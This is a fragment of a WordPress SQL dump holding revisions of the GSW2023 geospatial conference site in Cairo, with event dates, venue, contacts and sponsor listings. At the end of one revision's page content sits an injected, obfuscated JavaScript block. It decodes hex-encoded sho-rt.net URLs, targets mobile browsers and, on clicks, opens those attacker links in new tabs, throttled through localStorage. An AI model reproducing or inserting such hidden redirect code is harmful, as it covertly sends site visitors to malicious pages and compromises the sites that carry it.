css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:25:27','2023-08-26 20:25:27','',3066,'https://gsw2023.com/?p=5407',0,'revision','',0),
(5408,1,'2023-08-26 20:26:52','2023-08-26 20:26:52','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 